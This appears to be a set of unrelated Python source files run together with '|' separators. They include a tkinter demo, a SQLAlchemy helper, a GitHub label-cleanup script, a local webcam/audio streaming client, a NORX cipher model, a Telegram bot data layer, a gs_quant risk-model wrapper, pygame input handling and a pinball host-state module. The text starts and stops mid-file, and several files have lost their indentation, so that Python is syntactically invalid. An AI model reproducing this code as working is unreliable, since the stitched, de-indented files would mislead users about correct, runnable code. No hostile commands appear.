                    command=print_selection)
c2 = tk.Checkbutton(window, text='C++', variable=var2, onvalue=1, offvalue=0,
                    command=print_selection)
c1.pack()
c2.pack()
window.mainloop()
|
# -*- coding: utf-8 -*-
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
import logging
from glob import Glob
from ormbase import OrmBase
from drivers import genericdevice
from alarm import alarmzone
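# genericdevice and alarmzone appear unused here; presumably importing them
# registers their ORM models on OrmBase.metadata so create_all() below can
# create their tables (an assumption about the wider project layout)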
'''
module implementing turhouse db connection
'''
def dbConnect():
'''
Create an engine
'''
Glob.dbEngine = create_engine(Glob.config.db())
OrmBase.metadata.create_all(Glob.dbEngine, checkfirst=True)
Glob.dbSession = sessionmaker(bind=Glob.dbEngine, expire_on_commit=False)
def get_or_create(session, model, **kwargs):
'''
Creates an object or returns the object if exists
from: http://stackoverflow.com/questions/2546207/does-sqlalchemy-have-an-equivalent-of-djangos-get-or-create
'''
instance = session.query(model).filter_by(**kwargs).first()
if instance:
return instance
else:
instance = model(**kwargs)
session.add(instance)
return instance
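# Example usage (GenericDevice is a hypothetical model name):
#     session = Glob.dbSession()
#     device = get_or_create(session, GenericDevice, name='relay1')
#     session.commit()  # get_or_create adds the instance but does not commit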
|
import requests
import os
import json
import logging
import argparse
from github import Github
owner = os.environ.get("GIT_ORG")
token = os.environ.get("GIT_TOKEN")
with open('github-management/manage-labels/labels.json') as file:
labels = json.load(file)
g = Github(token)
org = g.get_organization(owner or 'fuchicorp')
repos = org.get_repos()
parser = argparse.ArgumentParser(description='Delete all labels that do not match the <labels.json> file')
parser.add_argument('--delete', help="Pass '--delete yes' to delete all non-matching labels")
args = parser.parse_args()
if args.delete == 'yes':
for repo in repos:
remote_labels = repo.get_labels()
for remote_label in remote_labels:
if remote_label.name not in [label['name'] for label in labels]:
try:
remote_label.delete()
logging.warning(f"Deleted label {remote_label.name} from {repo.name}")
                except Exception as e:
                    logging.error(f"Failed to delete {remote_label.name} from {repo.name}: {e}")
logging.warning("All labels are has been deleted !!")
else:
logging.error("Please use --delete yes")
|
import socket
import cv2
import numpy as np
import time
import threading
import pyaudio
import wavio
import wave
class sendDataThread(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
    # Send buffer-type data: a fixed-width length header is sent first,
    # followed by the data itself
def sendData(self,serversocket, stringData):
        # First send the length of the payload as a fixed 16-byte header;
        # str.ljust left-justifies the string, padding with spaces to width 16
        serversocket.send(str.encode(str(len(stringData)).ljust(16)))
        # Then send the payload itself
        serversocket.send(stringData)
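        # A matching receiver would read the fixed 16-byte header first, then
        # loop until the full payload arrives (sketch, assuming the same
        # framing on the server side):
        #     header = conn.recv(16)
        #     length = int(header)
        #     data = b''
        #     while len(data) < length:
        #         data += conn.recv(length - len(data))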
class videoClientThread(sendDataThread):
def __init__(self):
super().__init__()
self.encode_param=[int(cv2.IMWRITE_JPEG_QUALITY),15]
self.serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
def run(self):
cap = cv2.VideoCapture(0)
ret, frame = cap.read()
serverhost = socket.gethostname()
serverport = 9999
self.serversocket.connect((serverhost, serverport))
        while True:
            ret, frame = cap.read()
            # Sleep briefly (10 ms) so frames are not sent faster than the
            # server can process; increase this if the server does heavy work
            time.sleep(0.01)
            # cv2.imencode compresses the frame into an in-memory byte stream;
            # '.jpg' selects JPEG encoding to keep the payload small
            result, imgencode = cv2.imencode('.jpg', frame, self.encode_param)
            # Wrap the encoded bytes in a numpy array
            videodata = np.array(imgencode)
            # Convert the numpy array to raw bytes for network transmission
            stringVideoData = videodata.tobytes()
            # Send the length header followed by the payload
            self.sendData(self.serversocket, stringVideoData)
            if cv2.waitKey(1) == ord('q'):
                break
        print("Client shutting down")
        self.serversocket.close()
class voiceClientThread(sendDataThread):
def __init__(self,videoCT):
super().__init__()
self.videoct = videoCT
self.CHUNK = 1024
self.FORMAT = pyaudio.paInt16
self.CHANNELS = 1
self.RATE = 44100
self.p = pyaudio.PyAudio()
self.serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
def run(self):
serverhost = socket.gethostname()
serverport = 10000
self.serversocket.connect((serverhost, serverport))
        # Open an audio input stream; stream.read(CHUNK) returns the raw samples
        stream = self.p.open(format=self.FORMAT, channels = self.CHANNELS, rate = self.RATE, input = True, frames_per_buffer = self.CHUNK)
        while self.videoct.is_alive():
            stringVoiceData = stream.read(self.CHUNK)
            self.sendData(self.serversocket, stringVoiceData)
            if cv2.waitKey(1) == ord('q'):
                break
        print("Client shutting down")
        stream.stop_stream()
        stream.close()
        self.p.terminate()
self.serversocket.close()
videoCT = videoClientThread()
videoCT.start()
voiceCT = voiceClientThread(videoCT)
voiceCT.start()
|
"""
Implementation of the NORX permutation.
https://norx.io
"""
from cipher_description import CipherDescription
r = []
def apply_h(cipher, x, y, wordsize):
"""
    H(x, y) = (x ^ y) ^ ((x & y) << 1)
Applies H on the whole word and assigns it to x.
"""
for bit in range(wordsize):
cipher.apply_xor("s{}".format(x + bit), "s{}".format(y + bit), "txor{}".format(bit))
cipher.apply_and("s{}".format(x + bit), "s{}".format(y + bit), "tand{}".format(bit))
cipher.apply_xor("s{}".format(x), "s{}".format(y), "s{}".format(x))
for bit in range(1, wordsize):
cipher.apply_xor("txor{}".format(bit), "tand{}".format(bit - 1), "s{}".format(x + bit))
def apply_g(cipher, a, b, c, d, wordsize):
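    # Sketch of what one G application computes on the words (a, b, c, d),
    # following the NORX specification (rotation amounts r0..r3 come from the
    # global list r):
    #   a = H(a, b); d = (a ^ d) >>> r0
    #   c = H(c, d); b = (b ^ c) >>> r1
    #   a = H(a, b); d = (a ^ d) >>> r2
    #   c = H(c, d); b = (b ^ c) >>> r3
    # Below, each rotation is realized bit-by-bit by copying the temporary
    # word t into the target word at an offset of r[i] positions.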
apply_h(cipher, a, b, wordsize)
for bit in range(wordsize):
cipher.apply_xor("s{}".format(a + bit),
"s{}".format(d + bit),
"t{}".format(bit))
for bit in range(wordsize):
cipher.apply_and("t{}".format(bit),
"t{}".format(bit),
"s{}".format(d + (bit - r[0]) % wordsize))
apply_h(cipher, c, d, wordsize)
for bit in range(wordsize):
cipher.apply_xor("s{}".format(b + bit),
"s{}".format(c + bit),
"t{}".format(bit))
for bit in range(wordsize):
cipher.apply_and("t{}".format(bit),
"t{}".format(bit),
"s{}".format(b + (bit - r[1]) % wordsize))
apply_h(cipher, a, b, wordsize)
for bit in range(wordsize):
cipher.apply_xor("s{}".format(a + bit),
"s{}".format(d + bit),
"t{}".format(bit))
for bit in range(wordsize):
cipher.apply_and("t{}".format(bit),
"t{}".format(bit),
"s{}".format(d + (bit - r[2]) % wordsize))
apply_h(cipher, c, d, wordsize)
for bit in range(wordsize):
cipher.apply_xor("s{}".format(b + bit),
"s{}".format(c + bit),
"t{}".format(bit))
for bit in range(wordsize):
cipher.apply_and("t{}".format(bit),
"t{}".format(bit),
"s{}".format(b + (bit - r[3]) % wordsize))
def generate_norx_version(wordsize, rounds):
global r
norx = CipherDescription(16 * wordsize)
s = [i*wordsize for i in range(16)]
if wordsize == 32:
r = [8, 11, 16, 31]
elif wordsize == 64:
r = [8, 19, 40, 63]
    # Each of the `rounds` iterations applies a column step followed by a
    # diagonal step of the permutation
    for _ in range(rounds):
        # Column round
        apply_g(norx, s[0], s[4], s[8], s[12], wordsize)
        apply_g(norx, s[1], s[5], s[9], s[13], wordsize)
        apply_g(norx, s[2], s[6], s[10], s[14], wordsize)
        apply_g(norx, s[3], s[7], s[11], s[15], wordsize)
        # Diagonal round
        apply_g(norx, s[0], s[5], s[10], s[15], wordsize)
        apply_g(norx, s[1], s[6], s[11], s[12], wordsize)
        apply_g(norx, s[2], s[7], s[8], s[13], wordsize)
        apply_g(norx, s[3], s[4], s[9], s[14], wordsize)
return norx
norx32 = generate_norx_version(32, 4)
norx64 = generate_norx_version(64, 4)
|
import json
import os
from collections import Counter
from telegram import InlineKeyboardMarkup, InlineKeyboardButton
from tkuosc_bot.utils.concurrent_func import async_edit_msg
class Meet:
_dir_path = os.path.join(os.path.dirname(__file__), '../../files/meet/')
OPENING = "open"
CLOSED = "close"
NOT_EXIST = None
def __init__(self, chat_id, message_id):
self.chat_id = chat_id
self.msg_id = message_id
self.meet_id = '{}{}'.format(message_id, chat_id)
self._name = None
self._observers_msg = None
@property
def name(self):
if self._name is None:
self._name = self.access_data()['meet_name']
return self._name
@property
def status(self):
if self.is_opening():
return self.__class__.OPENING
elif self.is_closed():
return self.__class__.CLOSED
else:
return self.__class__.NOT_EXIST
@property
def observers_msg(self):
if self._observers_msg is None:
self._observers_msg = self.access_data()['observers_msg']
return self._observers_msg
def open(self, meet_name):
file_name = os.path.join(self.__class__._dir_path,
'open/{}.json'.format(self.meet_id))
with open(file_name, 'w') as meet_data:
data = {
'meet_name': meet_name,
'observers_msg': [],
'order_users': {}
}
json.dump(data, meet_data)
def close(self):
os.rename(os.path.join(self.__class__._dir_path, 'open/{}.json'.format(self.meet_id)),
os.path.join(self.__class__._dir_path, 'close/{}.json'.format(self.meet_id))
)
def is_opening(self):
"""
        Check whether the meet is open.
:return: Boolean
"""
dir_path = os.path.join(self.__class__._dir_path, 'open/')
return '{}.json'.format(self.meet_id) in os.listdir(dir_path)
def is_closed(self):
dir_path = os.path.join(self.__class__._dir_path, 'close/')
return '{}.json'.format(self.meet_id) in os.listdir(dir_path)
def access_data(self):
"""
        Return the meet's data as a dictionary.
        If the meet does not exist, return None.
:return: dictionary | None
"""
if self.status is self.__class__.NOT_EXIST:
return None
file_name = os.path.join(self.__class__._dir_path, '{}/{}.json'.format(self.status, self.meet_id))
with open(file_name, 'r') as data_file:
return json.load(data_file)
def has_user(self, uid):
return str(uid) in self.access_data()['order_users']
    def _update_meet(self):
        # Generator-based read-modify-write: the caller's for loop mutates the
        # yielded dict in place, and the write-back below runs when the loop
        # resumes and exhausts the generator (see the sketch at the end of
        # this module).
file_name = os.path.join(self.__class__._dir_path, '{}/{}.json'.format(self.status, self.meet_id))
with open(file_name, 'r+') as data_file:
meet_data = json.load(data_file)
yield meet_data
data_file.seek(0)
json.dump(meet_data, data_file)
data_file.truncate()
def update_order(self, order_data):
for meet_data in self._update_meet():
meet_data['order_users'].update(order_data)
def add_observer_msg(self, msg):
observer_msg = [msg.chat_id, msg.message_id]
for meet_data in self._update_meet():
if observer_msg not in meet_data['observers_msg']:
meet_data['observers_msg'].append(observer_msg)
self._observers_msg = meet_data['observers_msg']
def update_user_status(self, uid, status):
        assert status in ('check_in', 'paid', 'got_drinks'), "Unknown status"
for meet_data in self._update_meet():
meet_data['order_users'][uid]['status'][status] = True
def list_participators_with_html(self):
order_users = self.access_data()['order_users']
if order_users:
text = '<b>Participators:</b>\n' + '\n'.join(
'<a href="tg://user?id={uid}">{name}</a> {order} {user_status}'.format(
uid=uid,
                name=data['username'] if data['username'] else data['first_name'].replace('&', '&amp;').replace(
                    '<', '&lt;').replace('>', '&gt;'),
user_status=self.user_status_with_html(data), **data)
for uid, data in order_users.items())
return text
return '<b>Participators:</b>\n' + ' Nobody now...'
def list_items_with_html(self):
items = Counter(user_data['order'] for user_data in self.access_data()['order_users'].values())
        text = '\n'.join(f"{item.replace('&', '&amp;').replace('<', '&lt;').replace('>', '&gt;'): <20}"
f" {quantity:<3}" for item, quantity in items.most_common())
return '<code>' + text + f'\n{f"總共有 {sum(items.values())} 筆": ^23}' '</code>'
@staticmethod
def user_status_with_html(data):
status = data['status']
if status['check_in']:
if status['paid']:
if status['got_drinks']:
text = '<code>飲料獲得</code>'
else:
text = f'''<a href="tg://user?id={data['cashier']}">已結帳</a>'''
else:
text = '<code>到達</code>'
else:
text = ''
return text
def notify_observers(self, bot, with_button=False):
text = self.list_participators_with_html()
keyboard = InlineKeyboardMarkup(
[[InlineKeyboardButton('收單', callback_data='收單, {}, {}'.format(self.chat_id, self.msg_id))]]
) if with_button else None
for chat_id, msg_id in self.observers_msg:
async_edit_msg(bot, text, chat_id, msg_id, keyboard=keyboard, parse_mode="HTML")
class Menu:
_dir_path = os.path.join(os.path.dirname(__file__), '../../files/menu/')
def __init__(self, menu):
"""
This menu file must fit the specified format
:param menu: string
"""
self.menu = menu
def options_provider(self):
"""
This options provider gives you a tuples of options.
If you answer it with one of the options by `send` method,
it will provide another tuples of options to you until raise a StopIteration.
:return: generator
"""
with open(os.path.join(self.__class__._dir_path, self.menu), 'r') as drinks_file:
drinks_title, drinks_list = json.load(drinks_file)
must_choose_title = drinks_title.pop()
for title in drinks_title:
chosen_one = yield title, tuple(drinks_list.keys())
drinks_list = drinks_list[chosen_one]
for must_choose_attribute in drinks_list.items():
yield '{}: {}'.format(must_choose_title, must_choose_attribute[0]), tuple(must_choose_attribute[1])
class Admin:
_dir_path = os.path.join(os.path.dirname(__file__), '../../files/admin/')
def __init__(self, admin):
self.admin = admin
def add(self, uid):
with open(os.path.join(self.__class__._dir_path, self.admin), 'a') as admin_file:
admin_file.write(f'\n{uid}')
def list(self):
"""
:return: a list of admin
"""
with open(os.path.join(self.__class__._dir_path, self.admin)) as admin_file:
return [admin.strip() for admin in admin_file]
def is_admin(self, uid):
return str(uid) in self.list()
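# A self-contained sketch (illustrative, not used by the bot) of the
# read-modify-write generator idiom behind Meet._update_meet: the for-loop
# body mutates the yielded dict, and the code after `yield` persists the
# changes when the loop resumes and exhausts the generator.
def _demo_update(store):
    data = dict(store)      # "load"
    yield data              # the caller mutates `data` in place
    store.clear()
    store.update(data)      # "save" runs when the for loop resumes
if __name__ == '__main__':
    db = {'order_users': {}}
    for snapshot in _demo_update(db):
        snapshot['order_users']['42'] = {'order': 'tea'}
    assert db['order_users']['42'] == {'order': 'tea'}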
|
import os
touching_dir = 'labeled_data/touching/'
not_touching_dir = 'labeled_data/not_touching/'
raw_data_dir = 'raw_data'
pos_frames_dir = 'pos_frames'
# Create the working directories if they do not already exist.
for path in (touching_dir, not_touching_dir, raw_data_dir, pos_frames_dir):
    if not os.path.exists(path):
        os.makedirs(path)
|
"""
Copyright 2019 Goldman Sachs.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing,
software distributed under the License is distributed on an
"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
KIND, either express or implied. See the License for the
specific language governing permissions and limitations
under the License.
"""
import datetime as dt
from typing import List, Dict
from gs_quant.api.gs.risk_models import GsRiskModelApi
from gs_quant.target.risk_models import RiskModelData, RiskModelCalendar, RiskModelFactor, \
DataAssetsRequest, Measure, Format
class RiskModel:
def __init__(self, model_id: str):
self.model = GsRiskModelApi.get_risk_model(model_id)
def get_dates(self, start_date: dt.date = None, end_date: dt.date = None) -> List:
""" Retrieve risk model dates for existing risk model """
return GsRiskModelApi.get_risk_model_dates(self.model.id, start_date, end_date)
def get_factor(self, factor_id: str) -> RiskModelFactor:
""" Retrieve risk model factor from model and factor ids """
return GsRiskModelApi.get_risk_model_factor(self.model.id, factor_id)
def create_factor(self, factor: RiskModelFactor):
""" Create a new risk model factor """
GsRiskModelApi.create_risk_model_factor(self.model.id, factor)
def update_factor(self, factor_id: str, factor: RiskModelFactor):
""" Update existing risk model factor """
GsRiskModelApi.update_risk_model_factor(self.model.id, factor_id, factor)
def delete_factor(self, factor_id: str):
""" Delete a risk model factor """
GsRiskModelApi.delete_risk_model_factor(self.model.id, factor_id)
def get_factor_data(self,
start_date: dt.date = None,
end_date: dt.date = None,
identifiers: List[str] = None,
include_performance_curve: bool = None) -> List[Dict]:
""" Retrieve factor data for existing risk model """
return GsRiskModelApi.get_risk_model_factor_data(self.model.id,
start_date,
end_date,
identifiers,
include_performance_curve)
def get_calendar(self) -> RiskModelCalendar:
""" Retrieve risk model calendar for existing risk model """
return GsRiskModelApi.get_risk_model_calendar(self.model.id)
def upload_calendar(self, calendar: RiskModelCalendar):
""" Upload risk model calendar to existing risk model """
return GsRiskModelApi.upload_risk_model_calendar(self.model.id, calendar)
def get_asset_universe(self,
start_date: dt.date,
end_date: dt.date,
assets: DataAssetsRequest = None,
limit_factors: bool = None,
data_format: Format = None) -> Dict:
""" Retrieve asset universe data for existing risk model """
return GsRiskModelApi.get_risk_model_data(self.model.id,
start_date,
end_date,
assets,
[Measure.Asset_Universe],
limit_factors, data_format)
def get_historical_beta(self,
start_date: dt.date,
end_date: dt.date,
assets: DataAssetsRequest = None,
limit_factors: bool = None,
data_format: Format = None) -> Dict:
""" Retrieve historical beta data for existing risk model """
return GsRiskModelApi.get_risk_model_data(self.model.id,
start_date,
end_date,
assets,
[Measure.Historical_Beta],
limit_factors,
data_format)
def get_total_risk(self,
start_date: dt.date,
end_date: dt.date,
assets: DataAssetsRequest = None,
limit_factors: bool = None,
data_format: Format = None) -> Dict:
""" Retrieve total risk data for existing risk model """
return GsRiskModelApi.get_risk_model_data(self.model.id,
start_date,
end_date,
assets,
[Measure.Total_Risk],
limit_factors,
data_format)
def get_specific_risk(self,
start_date: dt.date,
end_date: dt.date,
assets: DataAssetsRequest = None,
limit_factors: bool = None,
data_format: Format = None) -> Dict:
""" Retrieve specific risk data for existing risk model """
return GsRiskModelApi.get_risk_model_data(self.model.id,
start_date,
end_date,
assets,
[Measure.Specific_Risk],
limit_factors,
data_format)
def get_residual_variance(self,
start_date: dt.date,
end_date: dt.date,
assets: DataAssetsRequest = None,
limit_factors: bool = None,
data_format: Format = None) -> Dict:
""" Retrieve residual variance data for existing risk model """
return GsRiskModelApi.get_risk_model_data(self.model.id,
start_date,
end_date,
assets,
[Measure.Residual_Variance],
limit_factors,
data_format)
def get_universe_factor_exposure(self,
start_date: dt.date,
end_date: dt.date,
assets: DataAssetsRequest = None,
limit_factors: bool = None,
data_format: Format = None) -> Dict:
""" Retrieve universe factor exposure data for existing risk model """
return GsRiskModelApi.get_risk_model_data(self.model.id,
start_date,
end_date,
assets,
[Measure.Universe_Factor_Exposure],
limit_factors,
data_format)
def get_factor_returns(self,
start_date: dt.date,
end_date: dt.date,
assets: DataAssetsRequest = None,
limit_factors: bool = None,
data_format: Format = None) -> Dict:
""" Retrieve factor return data for existing risk model """
return GsRiskModelApi.get_risk_model_data(self.model.id,
start_date,
end_date,
assets,
[Measure.Factor_Return],
limit_factors,
data_format)
def get_covariance_matrix(self,
start_date: dt.date,
end_date: dt.date,
assets: DataAssetsRequest = None,
limit_factors: bool = None,
data_format: Format = None) -> Dict:
""" Retrieve covariance matrix data for existing risk model """
return GsRiskModelApi.get_risk_model_data(self.model.id,
start_date,
end_date,
assets,
[Measure.Covariance_Matrix],
limit_factors,
data_format)
def get_issuer_specific_covariance(self,
start_date: dt.date,
end_date: dt.date,
assets: DataAssetsRequest = None,
limit_factors: bool = None,
data_format: Format = None) -> Dict:
""" Retrieve issuer specific covariance data for existing risk model """
return GsRiskModelApi.get_risk_model_data(self.model.id,
start_date,
end_date,
assets,
[Measure.Issuer_Specific_Covariance],
limit_factors,
data_format)
def get_factor_portfolios(self,
start_date: dt.date,
end_date: dt.date,
assets: DataAssetsRequest = None,
limit_factors: bool = None,
data_format: Format = None) -> Dict:
""" Retrieve factor portfolios data for existing risk model """
return GsRiskModelApi.get_risk_model_data(self.model.id,
start_date,
end_date,
assets,
[Measure.Factor_Portfolios],
limit_factors,
data_format)
def get_data(self,
measures: List[Measure],
start_date: dt.date,
end_date: dt.date,
assets: DataAssetsRequest = None,
limit_factors: bool = None,
data_format: Format = None) -> Dict:
""" Retrieve data for multiple measures for existing risk model """
return GsRiskModelApi.get_risk_model_data(self.model.id,
start_date,
end_date,
assets,
measures,
limit_factors,
data_format)
def upload_data(self, data: RiskModelData):
""" Upload risk model data to existing risk model """
GsRiskModelApi.upload_risk_model_data(self.model.id, data)
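# Minimal usage sketch (requires an authenticated gs_quant session; the model
# id and dates below are placeholders, not real values):
#
#     model = RiskModel('MODEL_ID')
#     dates = model.get_dates(dt.date(2021, 1, 1), dt.date(2021, 1, 31))
#     cov = model.get_covariance_matrix(dt.date(2021, 1, 4), dt.date(2021, 1, 4))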
|
import pygame, draw
DEFAULTVIEWDIMS = (0, 0, 500, 500)
MINZOOM = 200
EDGEPIXELRANGE = 20
DEFAULTZOOM = 1.1
class ZoomError(StandardError):
pass
class StateError(StandardError):
pass
class gameViewControl:
"""This class controls the game view"""
def __init__(self, display, board, bgLayers):
self._display = display
self._board = board
self._bgLayers = bgLayers
self._boardViewRect = pygame.Rect(display.get_rect())
self._curZoom = 1
def update(self, t, *args, **kwargs):
board = self._board
## self._bgLayers.update(t)
## self._bgLayers.draw(self._display)
board.update(t, *args, **kwargs)
bRect = board.get_boardRect() ##this will be a pygame.Rect
vRect = self._boardViewRect ##this will be a pygame.Rect
boardSurface = pygame.Surface(bRect.size)
boardSurface.blit(self._bgLayers, (0, 0))
board.draw(boardSurface)
try:
boardView = boardSurface.subsurface(vRect)
except ValueError:
while(not boardSurface.get_rect().contains(vRect)):
vRect.inflate_ip(-1,-1)
self._boardViewRect = vRect
boardView = boardSurface.subsurface(vRect.clip(bRect))
pygame.transform.smoothscale(boardView,\
self._display.get_size(),\
self._display)
def zoom(self, zoomBy):
"""Zooms the view in or out.
zoomBy is the fractional difference in the view window
after the zoom. e.g.: zoomBy<0 is a zoom in, while
zoomBy>0 is a zoom out."""
if zoomBy<=0:
raise ZoomError("zoomBy must be greater than 0")
zoomBy = zoomBy - 1
orig_bVRect = pygame.Rect(self._boardViewRect)
size = (self._boardViewRect[2]*zoomBy,\
self._boardViewRect[3]*zoomBy)
bRect = self._board.get_boardRect()
self._boardViewRect.inflate_ip(*size)
self._boardViewRect.clamp_ip(bRect)
if not bRect.contains(self._boardViewRect):
self._boardViewRect = orig_bVRect
elif not all(i>MINZOOM for i in self._boardViewRect.size):
self._boardViewRect = orig_bVRect
else:
self._curZoom += self._curZoom*zoomBy
def move(self, x, y):
bRect = self._board.get_boardRect()
self._boardViewRect.move_ip(x*self._curZoom,\
y*self._curZoom)
self._boardViewRect.clamp_ip(bRect)
class inputControl:
"""This class controls input through an interpreter.
This is the bare bones base class."""
def __init__(self, **kwargs):
self.attributes = kwargs
def changePlayer(self, newPlayer):
self._player = newPlayer
def changeboard(self, newboard):
self._board = newboard
def changeViewControl(self, newViewControl):
self._viewControl = newViewControl
def onMousePress(self, mouseButton):
print "you pressed mouse", mouseButton
return
def onClick(self, mouseButton):
print "you clicked", mouseButton
return
def onDoubleClick(self):
print "double click!"
return
def onMouseOnEdge(self, edgeSections):
print "mouse is on edges", edgeSections
return
def onScroll(self, upOrDown):
"""up == 1, down == 0"""
if upOrDown == 1:
print "scroll up"
if upOrDown == 0:
print "scroll down"
return
def onDrag(self, mouseMotionEvent):
print "you dragged", mouseMotionEvent.rel,\
mouseMotionEvent.pos
return
def onKeyPress(self, key):
print "you pressed the key", key
return
def onKeyHold(self, key):
print "you are holding the key", key
return
def onStartDragging(self, mouseButton):
print "you started dragging with mouse", mouseButton
def onStopDragging(self, mouseButton):
print "you stopped dragging with mouse", mouseButton
## def onKeyHoldToDrag(self, keyPressed):
## return
class makeType_gIC(inputControl):
"""This is an abstract class for
state wrappers for gameInputControl."""
def __init__(self, gameInputControl, **newAttributes):
self.attributes = gameInputControl.attributes
for key in newAttributes.iterkeys():
self.attributes[key] = newAttributes[key]
self._linkAttributes()
def _linkAttributes(self):
return
class makeBoard_gIC(makeType_gIC):
"""Wrapper for inputControl.
This makes the current gameInputControl
into a controller for the Board.
Implements gameInputControl. """
def _linkAttributes(self):
self._player = self.attributes["player"]
self._board = self.attributes["board"]
self._viewControl = self.attributes["viewControl"]
def onMousePress(self, mouseButton):
print "you pressed mouse", mouseButton
return
def onClick(self, mouseButton):
print "you clicked", mouseButton
return
def onDoubleClick(self):
print "double click!"
return
def onMouseOnEdge(self, edgeSections):
print "mouse is on edges", edgeSections
return
def onScroll(self, upOrDown):
"""up == 1, down == 0"""
if upOrDown == 1:
self._viewControl.zoom(DEFAULTZOOM**-1)
if upOrDown == 0:
self._viewControl.zoom(DEFAULTZOOM)
return
def onDrag(self, mouseMotionEvent):
self._viewControl.move(-mouseMotionEvent.rel[0],\
-mouseMotionEvent.rel[1])
return
def onKeyPress(self, key):
print "you pressed the key", key
return
def onKeyHold(self, key):
print "you are holding the key", key
return
def onStartDragging(self, mouseButton):
print "you started dragging with mouse", mouseButton
def onStopDragging(self, mouseButton):
print "you stopped dragging with mouse", mouseButton
class inputInterpreter:
"""This class interprets input"""
def __init__(self, state="board", doubleClickDelay=250, holdDelay = 150,\
**kwargs):
self._gIC = inputControl(**kwargs)
self.changeState(state)
self._dCdelay = doubleClickDelay
self._holdDelay = holdDelay
self._lastMouseHoldTime = 0
self._lastKeyHoldTime = 0
self._mousePressed = None
## self._mousePressedLastFrame = False
self._mouseHeldInDelay = False
self._LMouseUpInDelay = False
## self._keyPressed = None
self._dragging = False
self._holding = False
self._doubleClicked = False
self._lastDoubleClick = 0
self._DCBlock = False
def changeState(self, newState):
if newState == "board":
self._gIC = makeBoard_gIC(self._gIC)
else:
raise StateError("There is no state " + str(newState))
def updateInput(self, t):
events = pygame.event.get()
pygame.event.clear()
if self._mouseHeldInDelay == True\
and (t - self._lastMouseHoldTime\
>=self._holdDelay)\
and not self._dragging:
self._gIC.onStartDragging(self._mousePressed)
self._dragging = True
if (t - self._lastDoubleClick\
>= self._dCdelay) and self._DCBlock:
self._DCBlock = False
self._doubleClicked = False
for ev in events:
if pygame.MOUSEBUTTONDOWN\
== ev.type:
if ev.button == 4:
self._gIC.onScroll(1)
break
if ev.button == 5:
self._gIC.onScroll(0)
break
self._mousePressed = ev.button
## self._mousePressedLastFrame = True
if self._LMouseUpInDelay and\
(t - self._lastMouseHoldTime\
<self._dCdelay):
if not self._DCBlock:
self._doubleClicked = True
self._LMouseUpInDelay = False
else:
self._LMouseUpInDelay = False
self._gIC.onMousePress(self._mousePressed)
self._mouseHeldInDelay = True
self._holding = True
self._lastMouseHoldTime = t
if pygame.MOUSEBUTTONUP\
== ev.type:
if self._doubleClicked and not self._DCBlock:
self._gIC.onDoubleClick()
self._doubleClicked = False
self._lastDoubleClick = t
self._DCBlock = True
elif not self._doubleClicked and\
not self._dragging:
self._gIC.onClick(ev.button)
elif self._dragging:
self._gIC.onStopDragging(ev.button)
if self._mouseHeldInDelay and\
ev.button == 1:
if t - self._lastMouseHoldTime\
<self._dCdelay:
self._LMouseUpInDelay = True
self._mouseHeldInDelay = False
self._dragging = False
self._holding = False
if pygame.KEYDOWN\
== ev.type:
self._lastKeyHoldTime = t
## self._keyPressed = ev.key
self._gIC.onKeyHold(ev.key)
if pygame.KEYUP\
== ev.type:
self._gIC.onKeyPress(ev.key)
if pygame.MOUSEMOTION\
== ev.type:
if self._dragging:
self._gIC.onDrag(ev)
elif self._holding:
self._gIC.onStartDragging(self._mousePressed)
self._dragging = True
onEdges = self.get_mouseOnEdges()
if onEdges != []:
self._gIC.onMouseOnEdge(onEdges)
def get_mouseOnEdges(self):
return []
class gameInputInterpreter(inputInterpreter):
"""This class interprets game input."""
def __init__(self, player, board, viewControl,\
state="board", doubleClickDelay=250, holdDelay = 150):
inputInterpreter.__init__(self, state, doubleClickDelay, holdDelay,\
player= player, board =board,\
viewControl= viewControl)
|
"""
host module functions:
cache the varied state data of hosts, providing continuity when mode changes
provide method names for publishing to thirtybirds topics
provide state data to http_server
data flow:
controller writes state data here
current mode reads and requests state data here
http_server reads and requests state data here
verbs:
request - send request to host for data
set - store response to request, called by controller.main()
get - return locally stored data
cmd - send command that returns nothing
to do:
ensure thread safety
what happens when controller writes to self.foo while mode and http_server read self.foo?
        safety could come from the fact that these are only used in main.run and never simultaneously
add vars and methods to store system tests
"""
import codecs
import os
import queue
import sys
import threading
import time
app_path = os.path.dirname((os.path.dirname(os.path.dirname(os.path.realpath(__file__)))))
sys.path.append(os.path.split(app_path)[0])
from thirtybirds3 import thirtybirds
from thirtybirds3.adapters.sensors.ina260 import ina260
class Host():
def __init__(self, hostname):
self.hostname = hostname
self.connected = False
self.ready = False
self.last_deadman = 0 #unix timestamp
        self.queue = queue.Queue()
self.df = -1
self.cpu_temp = -1
self.pinball_git_timestamp = ""
self.tb_git_timestamp = ""
self.response_current_sensor_present = -1
self.response_current_sensor_value = -1
self.response_current_sensor_nominal = -1
def set_connected(self, connected):
self.connected = connected
def get_connected(self):
return self.connected
def set_ready(self, ready):
self.ready = ready
    def get_ready(self):
        return self.ready
def set_last_deadman(self, last_deadman):
self.last_deadman = last_deadman
    def get_last_deadman(self):
        return self.last_deadman
def set_computer_details(self,computer_details):
self.df = computer_details["df"]
self.cpu_temp = computer_details["cpu_temp"]
self.pinball_git_timestamp = computer_details["pinball_git_timestamp"]
self.tb_git_timestamp = computer_details["tb_git_timestamp"]
def get_computer_details(self):
return {
"df":self.df,
"cpu_temp":self.cpu_temp,
"pinball_git_timestamp":self.pinball_git_timestamp,
"tb_git_timestamp":self.tb_git_timestamp,
}
def get_computer_details_received(self):
if self.df == -1:
return False
if self.cpu_temp == -1:
return False
if self.pinball_git_timestamp == "":
return False
if self.tb_git_timestamp == "":
return False
return True
def get_df(self):
return self.df
def get_cpu_temp(self):
return self.cpu_temp
def get_pinball_git_timestamp(self):
return self.pinball_git_timestamp
def get_tb_git_timestamp(self):
return self.tb_git_timestamp
def set_current_sensor_present(self,response_current_sensor_present):
self.response_current_sensor_present = response_current_sensor_present
def set_current_sensor_value(self,response_current_sensor_value):
self.response_current_sensor_value = response_current_sensor_value
def set_current_sensor_nominal(self,response_current_sensor_nominal):
self.response_current_sensor_nominal = response_current_sensor_nominal
def get_current_sensor_present(self):
return self.response_current_sensor_present
def get_current_sensor_value(self):
return self.response_current_sensor_value
def get_current_sensor_nominal(self):
